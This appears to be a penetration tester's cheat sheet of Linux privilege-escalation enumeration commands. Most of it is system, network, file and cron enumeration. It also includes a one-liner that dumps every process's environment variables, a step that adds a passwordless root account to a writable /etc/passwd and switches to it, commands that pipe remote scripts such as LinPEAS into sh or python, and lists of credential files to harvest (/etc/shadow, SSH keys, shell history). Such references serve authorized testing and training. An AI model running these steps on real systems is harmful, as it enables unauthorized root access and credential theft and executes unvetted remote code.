Enum
Things to do
Basic enum
cat /etc/issue
cat /etc/os-release
uname -a # Always check online for CVE
groups # Docker ? sudo ?
cat /etc/passwd
cat /etc/group
ps faxwu | cat
dpkg -l
lsmod
/sbin/modinfo interestingmodule
systemctl --type=service | cat # List services
# Network
ss -lapunte | cat
netstat -ntlp | cat
ip a
ip route
route
routel
cat /etc/iptables/rules.v4
iptables -L
# Files
ls -ltrha / /opt /srv /home/* /root/
ls -ltrha /var/www/*
find /home/ -type f -size +0
sudo -l # if you need TTY : python3 -c 'import pty; pty.spawn("/bin/bash")'
find / -perm -4000 2>/dev/null # Find all SUID binaries
find / -perm -u=s -type f 2>/dev/null
find / -type f \( -user userblabla -o -group userblabla \) -size +0 -exec file {} + 2>/dev/null
mount
cat /etc/fstab
lsblk
find / -writable -type d 2>/dev/null
cat ~/.bashrc
/usr/sbin/getcap -r / 2>/dev/null
# Env by process
cd /proc/ ; for i in [0-9]* ; do echo -e "\n## $i $(ps -fp $i 2>/dev/null)" ; cat $i/environ 2>/dev/null | tr '\0' '\n' | strings ; done
# Crons
ls -lah /etc/cron*
crontab -l
grep "CRON" /var/log/syslog
# App armor status
aa-status
# Add user if passwd is writable
cat <<'EOF'>>/etc/passwd
hackerhackerhacker::0:0:root:/root:/bin/bash
EOF
su - hackerhackerhacker -c "sed -i '/hackerhackerhacker/d' /etc/passwd;id;su -"
Scripts
LinPEAS
curl https://raw.githubusercontent.com/carlospolop/privilege-escalation-awesome-scripts-suite/master/linPEAS/linpeas.sh | sh
LinEnum
curl https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh | sh
SUID Enum
Enum SUID program with python2/3 built-in modules
curl https://raw.githubusercontent.com/Anon-Exploiter/SUID3NUM/master/suid3num.py | python
Watch Process
Watch for existing and new process
Interesting Files
Public
#
/etc/issue
/etc/passwd
/etc/group
Root
#
/etc/sudoers
/etc/shadow
/etc/master.passwd # OpenBSD
/var/spool/cron/crontabs/*
/var/spool/cron/*
User
#
/home/*/.bash_history
/home/*/.ssh/*
Auditd (adm)
When parsing audit logs you may encounter hex encoded data
for VAR in cmd data ; do
for DATA in $(grep "$VAR=[^\"]" /var/log/audit/audit.log*) ; do
echo "$DATA" | sed "s#.*$VAR=\([^ ]*\).*#\1#" | xxd -r -p | tr -dc '[:print:]\t\n' | echo $(cat)
done
done
Scan Ports
Retrieve hidden ports without scanner/netstat
bash -c 'for i in {1..65535};do echo>/dev/tcp/127.0.0.1/$i&&echo OK $i;done' 2>/dev/null